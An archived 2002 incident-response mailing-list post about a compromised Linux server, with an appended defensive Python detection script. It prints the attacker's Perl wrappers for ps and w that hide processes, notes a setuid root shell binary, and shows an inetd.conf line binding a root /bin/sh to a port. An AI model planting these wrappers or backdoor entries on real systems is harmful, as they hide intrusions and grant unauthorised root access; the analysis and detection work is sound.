nouser - rootkit ?

From: Dan Uscatu (duscatuat_private)
Date: Sun Feb 10 2002 - 15:44:31 PST


 hi
 i found today something funny happening when i tried to install a web server on a customer's machine:
 1. w - returned some weird "/usr/bin/perl" processes
 2. ps - was not showing everything
 3. two connections to some irc servers; fuser - finding the process id's for them, but ps not showing them

 some info about the server (unfortunately it wasn't installed by me...):
 [root@www root]# uname -a
 Linux www 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown (compiled in
 the future too, lol)
 [root@www /root]# cat /etc/redhat-release
 Red Hat Linux release 7.1 (Seawolf)

 more digging... so i found some modified files:

 [root@www nouser]# ls -l /bin/ps
 -rwxr-xr-x    1 nouser   nouser        188 Mar  2 15:45 /bin/ps

 [root@www /root]# cat /bin/ps
 #!/usr/bin/perl
 $xargs =join(' ',@ARGV);
 $ps = `/usr/lib/libxnotps $xargs \| grep -v nouser \| grep -v noshell \| grep -v proftp \| grep -v \"/bin/ps\" \| grep -v libxnotps`;
 print "$ps";
 [root@www /root]# ls -l /usr/lib/libxnotps
 -r-xr-xr-x    1 root     root        64092 Apr  5  2001 /usr/lib/libxnotps

 [root@www nouser]# ls -l /usr/bin/w
 -rwxr-xr-x    1 nouser   nouser        105 Jan 20 01:03 /usr/bin/w

 [root@www /root]# cat /usr/bin/w
 #!/usr/bin/perl
 $xargs =join(' ',@ARGV);
 $w = `/usr/lib/libxyotps $xargs \| grep -v nouser`;
 print "$w";
 [root@www /root]# ls -l /usr/lib/libxyotps
 -r-xr-xr-x    1 root     root         8688 Apr  5  2001 /usr/lib/libxyotps

 there is another file called /usr/lib/libxzotps, but i couldn't find what is pointing at that yet.
 no reference found on the web, searching for "libxnotps" or "libxnotps" or "libxzotps"

 [root@www nouser]# grep nouser /etc/passwd
 nouser:x:502:502::/sbin/nouser:/bin/bash

 [root@www nouser]# ls -l /sbin/nouser
 total 3328
-rw-r--r--    1 nouser   nouser      80092 Mar  2 23:22 broadcast-5000.log
-rw-r--r--    1 nouser   nouser    3057793 Mar  2 23:22 broadcast-full.log
drwxr-xr-x    2 nouser   nouser       4096 Mar  2 13:01 Desktop
drwxrwxr-x    4 nouser   nouser       4096 Mar  5 19:23 iroffer
-rw-rw-r--    1 nouser   nouser     206865 Mar  5 19:23 iroffer.tar.gz
-rwsr-xr-x    1 root     root        13855 Mar  2 13:04 nouser
-rw-rw-r--    1 root     root         2215 Mar  2 23:23 packet0r.pl
drwxrwxr-x    3 nouser   nouser       4096 Jan 20 01:15 scan-1
drwxr-xr-x    3 nouser   root         4096 Mar  2 13:04 scan-2
drwxr-xr-x    3 nouser   root         4096 Mar  2 13:04 scan-3
drwxrwxr-x    3 nouser   nouser       4096 Jan 20 01:13 war

 of course the suid "nouser" gives a root shell... and the directories are full of war scripts, flood tools, and warez... given away through irc bots

i have scanned the machine using chkrootkit... the only funny thing found was an inetd.conf, containing:

 [root@www nouser]# cat /etc/inetd.conf
65456    stream  tcp     nowait  root  /bin/sh     sh

 of course, inetd is not installed :) that points me to the idea that the process was somehow automated... but i can't find any reference to a rootkit that does these changes. seems pretty stupid for a rootkit anyway... but i want to be sure no other major changes were made... before i install the production server there.

thanks for any comments
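A defender-side check for the two symptoms described in this post (core binaries replaced by Perl wrappers owned by a non-root user, and processes that /proc and fuser know about but ps hides), written as an added example; it is not part of the original message, and the paths in CRITICAL_BINARIES and the `ps -eo pid,user,args` column format are assumptions.

```python
import os
import subprocess

# Binaries the post shows replaced by Perl wrappers, plus a few others (assumed paths).
CRITICAL_BINARIES = ["/bin/ps", "/usr/bin/w", "/bin/ls", "/bin/netstat", "/usr/bin/who"]

def classify_file(head: bytes, owner_uid: int) -> list[str]:
    """Findings for a system binary from its first bytes and owner uid."""
    findings = []
    if head.startswith(b"#!"):
        findings.append("script-wrapper")   # '#!/usr/bin/perl' in place of an ELF, as on /bin/ps
    elif not head.startswith(b"\x7fELF"):
        findings.append("not-elf")
    if owner_uid != 0:
        findings.append("not-root-owned")   # /bin/ps and /usr/bin/w were owned by uid 502 (nouser)
    return findings

def parse_ps_pids(ps_output: str) -> set[int]:
    """PIDs from 'ps -eo pid,user,args' output; the wrapper's 'grep -v nouser' drops whole lines."""
    pids = set()
    for line in ps_output.splitlines():
        fields = line.split()
        if fields and fields[0].isdigit():
            pids.add(int(fields[0]))
    return pids

def hidden_pids(proc_pids: set[int], ps_pids: set[int]) -> set[int]:
    """PIDs present in /proc (what fuser saw) but absent from ps output."""
    return proc_pids - ps_pids

def live_proc_pids() -> set[int]:
    return {int(d) for d in os.listdir("/proc") if d.isdigit()}

if __name__ == "__main__":
    for path in CRITICAL_BINARIES:
        try:
            with open(path, "rb") as fh:
                head = fh.read(4)
            uid = os.stat(path).st_uid
        except OSError:
            continue
        for finding in classify_file(head, uid):
            print(f"{path}: {finding}")
    # Sample /proc before and after ps so PIDs that exited in between are not reported.
    before = live_proc_pids()
    ps_out = subprocess.run(["ps", "-eo", "pid,user,args"], capture_output=True, text=True).stdout
    after = live_proc_pids()
    for pid in sorted(hidden_pids(before & after, parse_ps_pids(ps_out))):
        print(f"pid {pid} is in /proc but not in ps output")
```

This only works because the wrappers here are userland scripts and /proc is still truthful; a kernel-module rootkit would filter /proc as well, so on a box like this the trustworthy baseline is an offline check from rescue media or package-manager verification, not anything run from the compromised system.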

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

This archive was generated by hypermail 2b30 : Sun Mar 10 2002 - 17:10:24 PST